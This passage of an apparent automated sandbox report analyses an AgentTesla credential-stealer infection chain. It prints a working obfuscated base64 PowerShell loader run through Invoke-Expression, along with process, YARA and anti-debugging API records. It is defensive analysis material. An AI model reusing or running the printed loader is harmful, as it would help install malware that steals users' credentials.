lanshacksbwB4slanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksPslanshacksslanshacks8slanshacksEIslanshacksQQBTslanshacksEUslanshacksNgslanshacks0slanshacksF8slanshacksRQBOslanshacksEQslanshacksPgslanshacks+slanshacksCcslanshacksOwslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshackscgBhslanshacksGQslanshacksaQBvslanshacksHMslanshackseQBtslanshacksG0slanshacksZQB0slanshacksHIslanshackseQslanshacksuslanshacksEkslanshacksbgBkslanshacksGUslanshackseslanshacksBPslanshacksGYslanshacksKslanshacksslanshackskslanshacksGMslanshackseQB0slanshacksG8slanshacksbQBlslanshacksHQslanshacksZQByslanshacksCkslanshacksOwslanshackskslanshacksHQslanshacksZQB0slanshacksHIslanshacksYQBzslanshacksHQslanshacksaQBjslanshacksGgslanshacksbwB1slanshacksHMslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksJslanshacksByslanshacksGEslanshacksZslanshacksBpslanshacksG8slanshackscwB5slanshacksG0slanshacksbQBlslanshacksHQslanshackscgB5slanshacksC4slanshacksSQBuslanshacksGQslanshacksZQB4slanshacksE8slanshacksZgslanshacksoslanshacksCQslanshacksdslanshacksB2slanshacksGkslanshackseslanshacksBislanshacksG8slanshackseslanshacksslanshackspslanshacksDsslanshacksJslanshacksBoslanshacksG8slanshacksbQBvslanshacksHslanshacksslanshacksbslanshacksBhslanshacksHMslanshacksdslanshacksslanshacksgslanshacksC0slanshacksZwBlslanshacksCslanshacksslanshacksMslanshacksslanshacksgslanshacksC0slanshacksYQBuslanshacksGQslanshacksIslanshacksslanshackskslanshacksHQslanshacksZQB0slanshacksHIslanshacksYQBzslanshacksHQslanshacksaQBjslanshacksGgslanshacksbwB1slanshacksHMslanshacksIslanshacksslanshackstslanshacksGcslanshacksdslanshacksslanshacksgslanshacksCQslanshacksaslanshacksBvslanshacksG0slanshacksbwBwslanshacksGwslanshacksYQBzslanshacksHQslanshacksOwslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCslanshacksslanshacksKwslanshacks9slanshacksCslanshacksslanshacksJslanshacksBjslanshacksHkslanshacksdslanshacksBvslanshacksG0slanshacksZQB0slanshacksGUslanshackscgslanshacksuslanshacksEwslanshacksZQBuslanshacksGcslanshacksdslanshacksBoslanshacksDsslanshacksJslanshacksByslanshacksGUslanshacksZwByslanshacksGUslanshackscwBzslanshacksGkslanshacksdgBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksdslanshacksBlslanshacksHQslanshackscgBhslanshacksHMslanshacksdslanshacksBpslanshacksGMslanshacksaslanshacksBvslanshacksHUslanshackscwslanshacksgslanshacksC0slanshacksIslanshacksslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksDsslanshacksJslanshacksBislanshacksGEslanshacksbslanshacksBkslanshacksG4slanshacksZQBzslanshacksHMslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksJslanshacksByslanshacksGEslanshacksZslanshacksBpslanshacksG8slanshackscwB5slanshacksG0slanshacksbQBlslanshacksHQslanshackscgB5slanshacksC4slanshacksUwB1slanshacksGIslanshackscwB0slanshacksHIslanshacksaQBuslanshacksGcslanshacksKslanshacksslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCwslanshacksIslanshacksslanshackskslanshacksHIslanshacksZQBnslanshacksHIslanshacksZQBzslanshacksHMslanshacksaQB2slanshacksGUslanshacksKQslanshacks7slanshacksCQslanshacksYQBuslanshacksHQslanshacksaQBzslanshacksGkslanshackscslanshacksBoslanshacksG8slanshacksbgBhslanshacksGwslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksWwBTslanshacksHkslanshackscwB0slanshacksGUslanshacksbQslanshacksuslanshacksEMslanshacksbwBuslanshacksHYslanshacksZQByslanshacksHQslanshacksXQslanshacks6slanshacksDoslanshacksRgByslanshacksG8slanshacksbQBCslanshacksGEslanshackscwBlslanshacksDYslanshacksNslanshacksBTslanshacksHQslanshackscgBpslanshacksG4slanshacksZwslanshacksoslanshacksCQslanshacksYgBhslanshacksGwslanshacksZslanshacksBuslanshacksGUslanshackscwBzslanshacksCkslanshacksOwslanshackskslanshacksG8slanshackscgBsslanshacksGEslanshacksZwBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksFsslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBSslanshacksGUslanshacksZgBsslanshacksGUslanshacksYwB0slanshacksGkslanshacksbwBuslanshacksC4slanshacksQQBzslanshacksHMslanshacksZQBtslanshacksGIslanshacksbslanshacksB5slanshacksF0slanshacksOgslanshacks6slanshacksEwslanshacksbwBhslanshacksGQslanshacksKslanshacksslanshackskslanshacksGEslanshacksbgB0slanshacksGkslanshackscwBpslanshacksHslanshacksslanshacksaslanshacksBvslanshacksG4slanshacksYQBsslanshacksCkslanshacksOwslanshackskslanshacksGMslanshacksZQBuslanshacksHQslanshackscgBhslanshacksGwslanshacksaQBzslanshacksGUslanshacksZslanshacksslanshacksgslanshacksD0slanshacksIslanshacksBbslanshacksGQslanshacksbgBsslanshacksGkslanshacksYgslanshacksuslanshacksEkslanshacksTwslanshacksuslanshacksEgslanshacksbwBtslanshacksGUslanshacksXQslanshacksuslanshacksEcslanshacksZQB0slanshacksE0slanshacksZQB0slanshacksGgslanshacksbwBkslanshacksCgslanshacksJwBWslanshacksEEslanshacksSQslanshacksnslanshacksCkslanshacksLgBJslanshacksG4slanshacksdgBvslanshacksGsslanshacksZQslanshacksoslanshacksCQslanshacksbgB1slanshacksGwslanshacksbslanshacksslanshackssslanshacksCslanshacksslanshacksWwBvslanshacksGIslanshacksagBlslanshacksGMslanshacksdslanshacksBbslanshacksF0slanshacksXQslanshacksgslanshacksEslanshacksslanshacksKslanshacksslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwBNslanshacksFMslanshacksQgB1slanshacksGkslanshacksbslanshacksBkslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksDIslanshacksJwslanshackspslanshacksCkslanshacks'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('slanshacks','A'))); Invoke-Expression $OWjuxd""
                                                                                      Imagebase:0x7ff7016f0000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      Show Windows behavior

                                                                                      Registry Activities

                                                                                      Powershell Activities

                                                                                      Show Windows behavior

                                                                                      Mutex Activities

                                                                                      Show Windows behavior

                                                                                      Process Activities

                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      Show Windows behavior

                                                                                      System Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Windows UI Activities

                                                                                      Process Token Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:16:48:51
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff62fc20000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Mutex Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Windows UI Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:16:49:02
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0xc30000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      Show Windows behavior

                                                                                      Registry Activities

                                                                                      Show Windows behavior

                                                                                      COM Activities

                                                                                      Show Windows behavior

                                                                                      Mutex Activities

                                                                                      Show Windows behavior

                                                                                      Process Activities

                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      Show Windows behavior

                                                                                      System Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      Network Activities

                                                                                      Process Token Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      Disassembly

                                                                                      Executed Functions

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1461999776.00007FFC3C740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C740000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c740000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L
                                                                                      • API String ID: 0-2909332022
                                                                                      • Opcode ID: 0ea81e4bfe4472ee673c5fc5229510916aa5171c245d260b1dbd3a53a98ad31a
                                                                                      • Instruction ID: 1b65c5590764c07d21bd84420e221941ae6d13793f7ebae0fda1af4468190225
                                                                                      • Opcode Fuzzy Hash: 0ea81e4bfe4472ee673c5fc5229510916aa5171c245d260b1dbd3a53a98ad31a
                                                                                      • Instruction Fuzzy Hash: 01429031A1D96E4FEBA9E72884256BD3AD2EF86390F4400BAD94EC72D3DD1C6C41D361
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1462549106.00007FFC3C810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c810000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f843b167f16240f43db26de9338e6c787540ec88e62a42118a7b8117af01736
                                                                                      • Instruction ID: 2f7a7710a133e7f679fcef9a831add48eaf67e18df353bdd4482eaf18b31f5a5
                                                                                      • Opcode Fuzzy Hash: 1f843b167f16240f43db26de9338e6c787540ec88e62a42118a7b8117af01736
                                                                                      • Instruction Fuzzy Hash: 77A14921A0DBDD4FE7A6D72858551783BE2EF86260F0801FFD149C7093E918AD0AC3E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1461999776.00007FFC3C740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C740000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c740000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a0ac979e90981908abe66e02300b3ef449fedcdaa89caec0b01528e33fa09ad
                                                                                      • Instruction ID: 1b631ef5bd11a1f639d5085ee9ae5e8444af5c71e94723f4520099cf33b13200
                                                                                      • Opcode Fuzzy Hash: 3a0ac979e90981908abe66e02300b3ef449fedcdaa89caec0b01528e33fa09ad
                                                                                      • Instruction Fuzzy Hash: 62918C30A0C92D8FEB98EB58C456ABC77E2EF99350F054179D40EC7296DE29BC42D750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1461999776.00007FFC3C740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C740000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c740000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a9a0d66234a72b39114c5471392f18594aa4fa89aca9ed585147d068d23d5ec
                                                                                      • Instruction ID: e2fcf4198a4ebc2347615bb9325237530c4548463dd0e79c36153737f619a3a1
                                                                                      • Opcode Fuzzy Hash: 9a9a0d66234a72b39114c5471392f18594aa4fa89aca9ed585147d068d23d5ec
                                                                                      • Instruction Fuzzy Hash: 52910330A1996E4FEB59EB2884162BD77D2EF86380B4440BDD94EC72D3DE1CB842D761
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1462549106.00007FFC3C810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c810000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60d762e1d1b2f7241807a7793de46eb73bbf891fbaa779e7371a72800e93664f
                                                                                      • Instruction ID: d217276bf2e0723490dbc6c123594b23476750cae4b8d84038cd2f6af863afdd
                                                                                      • Opcode Fuzzy Hash: 60d762e1d1b2f7241807a7793de46eb73bbf891fbaa779e7371a72800e93664f
                                                                                      • Instruction Fuzzy Hash: 71612922E0DEAF0FFBA5D62814552BD66D2DF91650B4800BEC10EC35D7ED0E9909D3A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1462549106.00007FFC3C810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c810000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82e849bc1824f802565114e2026d8a11fef36ee5642241cf753496c21737eccc
                                                                                      • Instruction ID: 678b2c8ee0a8d18ee763a153e5e4d7b9f0cd5cc03071dd9ac7cba501d26d6954
                                                                                      • Opcode Fuzzy Hash: 82e849bc1824f802565114e2026d8a11fef36ee5642241cf753496c21737eccc
                                                                                      • Instruction Fuzzy Hash: 76412A52E0EEEF0FFBA5D22904552BD56C2DF91690B5800BAC50EC34D3DD0E9D09E2A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1462549106.00007FFC3C810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c810000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c16d5b1a3d288edbf7b3d9e30ef03620a337594295d83a85c0b154c1b9f1e23
                                                                                      • Instruction ID: 2f9e63629add71e87e0016b7f5269459e379663feeb4c0a23cfab1429c0ef1e9
                                                                                      • Opcode Fuzzy Hash: 0c16d5b1a3d288edbf7b3d9e30ef03620a337594295d83a85c0b154c1b9f1e23
                                                                                      • Instruction Fuzzy Hash: F821E622B0CA3E4FFBA4D65C64459B8B3D2EF94260B0801BBC11EC3196DE09BD15D3D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1461999776.00007FFC3C740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C740000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c740000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction ID: 597a785364e3060362f806b8a90e5a601160b018633b8ea80306be40b443aa60
                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction Fuzzy Hash: A301677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3661DB36E882CB45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1461999776.00007FFC3C740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C740000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c740000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c70d043434eeea04c13db9885a3af633929104960d26f65e14c776a8d41d3319
                                                                                      • Instruction ID: 648602459bcea614a8248e448494de6fd1848475657553ecc2c26756bc9361df
                                                                                      • Opcode Fuzzy Hash: c70d043434eeea04c13db9885a3af633929104960d26f65e14c776a8d41d3319
                                                                                      • Instruction Fuzzy Hash: F3C001B368E62D09A54C6448B8030F8B380D682171690266FEA8A819A7A84B25A74089
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.1461999776.00007FFC3C740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C740000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffc3c740000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a333eba442114b364824a335924f16ea92298987c77d32433e9f1e85504cc5a
                                                                                      • Instruction ID: c8f302843cfb02ac226c9b6a7f10535d1bfe4ef410ad6e6689c91fba29329390
                                                                                      • Opcode Fuzzy Hash: 3a333eba442114b364824a335924f16ea92298987c77d32433e9f1e85504cc5a
                                                                                      • Instruction Fuzzy Hash: 84E0C23190C82ECBEB10FA40C841EED73A1EB51360F158136C909D72D5CD2CBC50D790

                                                                                      Execution Graph

                                                                                      Execution Coverage

                                                                                      Dynamic/Packed Code Coverage

                                                                                      Signature Coverage

                                                                                      Execution Coverage:11.2%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:23.1%
                                                                                      Total number of Nodes:13
                                                                                      Total number of Limit Nodes:2
                                                                                      Show Legend
                                                                                      Hide Nodes/Edges
                                                                                      execution_graph 25433 6819f40 25436 6819f68 25433->25436 25434 6819f4e 25437 6819f85 25436->25437 25438 6819fad 25436->25438 25437->25434 25439 6819fce 25438->25439 25440 681a096 GlobalMemoryStatusEx 25438->25440 25439->25434 25441 681a0c6 25440->25441 25441->25434 25442 2d770b0 25443 2d770f4 CheckRemoteDebuggerPresent 25442->25443 25444 2d77136 25443->25444 25445 681ef98 DuplicateHandle 25446 681f02e 25445->25446

                                                                                      Executed Functions

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1264 2d770b0-2d77134 CheckRemoteDebuggerPresent 1266 2d77136-2d7713c 1264->1266 1267 2d7713d-2d77178 1264->1267 1266->1267
                                                                                      APIs
                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02D77127
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2481596190.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_2d70000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: 8143320ae88a1cc726c7a88c2e12c4b18d3934b7472f50dcdda491efb1907623
                                                                                      • Instruction ID: 947990681c15a0e8c9544dd95203cf002b7c30f73d0fed298024b8d74b6706af
                                                                                      • Opcode Fuzzy Hash: 8143320ae88a1cc726c7a88c2e12c4b18d3934b7472f50dcdda491efb1907623
                                                                                      • Instruction Fuzzy Hash: A92116B1900259CFDB14CF9AD444BEEFBF4AF48210F14845AE855A7350D778A944CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1089 6819f68-6819f83 1090 6819f85-6819fac call 68196fc 1089->1090 1091 6819fad-6819fcc call 6819708 1089->1091 1097 6819fd2-681a031 1091->1097 1098 6819fce-6819fd1 1091->1098 1105 681a033-681a036 1097->1105 1106 681a037-681a0c4 GlobalMemoryStatusEx 1097->1106 1111 681a0c6-681a0cc 1106->1111 1112 681a0cd-681a0f5 1106->1112 1111->1112
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52bc6ddc04531d464a3ac170cb09414eff4910d37b5eec98e9c011f9eab82199
                                                                                      • Instruction ID: 6db710e0fc646cfb668c968b4e1e75bdd63951a8b0e8756a0279fd68afa1a247
                                                                                      • Opcode Fuzzy Hash: 52bc6ddc04531d464a3ac170cb09414eff4910d37b5eec98e9c011f9eab82199
                                                                                      • Instruction Fuzzy Hash: F9514471D083968FCB15CF79D81069EBFF4AF86220F1486ABD194EB292DB749841CBD1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1247 681ef90-681ef95 1248 681ef97 1247->1248 1249 681ef78-681ef84 1247->1249 1250 681ef98-681f02c DuplicateHandle 1248->1250 1252 681f035-681f052 1250->1252 1253 681f02e-681f034 1250->1253 1253->1252
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0681F01F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: ad7148b56ac3bbc6ff403fd72525046ff71bf9a7ab0c47fcaa7a9958394043a5
                                                                                      • Instruction ID: 607e358a1b9d5f2ba6b3b573eb26cacbb75cf8c1338f3a9833a8c9b1b4e4c9d4
                                                                                      • Opcode Fuzzy Hash: ad7148b56ac3bbc6ff403fd72525046ff71bf9a7ab0c47fcaa7a9958394043a5
                                                                                      • Instruction Fuzzy Hash: 0321F8B5D003499FDB10CF9AD884ADEBBF9EB48320F14841AE914E7350D375A954CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1257 2d770a8-2d77134 CheckRemoteDebuggerPresent 1260 2d77136-2d7713c 1257->1260 1261 2d7713d-2d77178 1257->1261 1260->1261
                                                                                      APIs
                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02D77127
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2481596190.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_2d70000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: 56e085ac5115dac7edf947e8326b6ef7974acdf7cf1bf5d03f0ecbd0011f1ffb
                                                                                      • Instruction ID: 0f5d1dfce3e7a85aee48dc09616876721b78817973478203176edb125e9cfd2b
                                                                                      • Opcode Fuzzy Hash: 56e085ac5115dac7edf947e8326b6ef7974acdf7cf1bf5d03f0ecbd0011f1ffb
                                                                                      • Instruction Fuzzy Hash: D22136B2800259CFDB10CF9AD884BEEFBF4EF49220F14841AE855A7341D778A944CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1270 681ef98-681f02c DuplicateHandle 1271 681f035-681f052 1270->1271 1272 681f02e-681f034 1270->1272 1272->1271
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0681F01F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: b36823c71f104ecba8330f9fd7a0893e2220ab5ee507208d18dfb5980d638792
                                                                                      • Instruction ID: d89d9f33a38f1eec245cf521dccde87d004838361195479482fd72e572468162
                                                                                      • Opcode Fuzzy Hash: b36823c71f104ecba8330f9fd7a0893e2220ab5ee507208d18dfb5980d638792
                                                                                      • Instruction Fuzzy Hash: 2021C4B5D00249DFDB10CF9AD984ADEBBF9EB48310F14841AE918A7350D379A944CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1276 681a050-681a08e 1277 681a096-681a0c4 GlobalMemoryStatusEx 1276->1277 1278 681a0c6-681a0cc 1277->1278 1279 681a0cd-681a0f5 1277->1279 1278->1279
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 0681A0B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: fe6817ad0ab7a0e175741e2238a12764bc5596ce477fe0127d7b2bda2a5d4b75
                                                                                      • Instruction ID: abc4da597c79d7b8acd96f3ca295f798758013d6cde931918bddc59991e52bcb
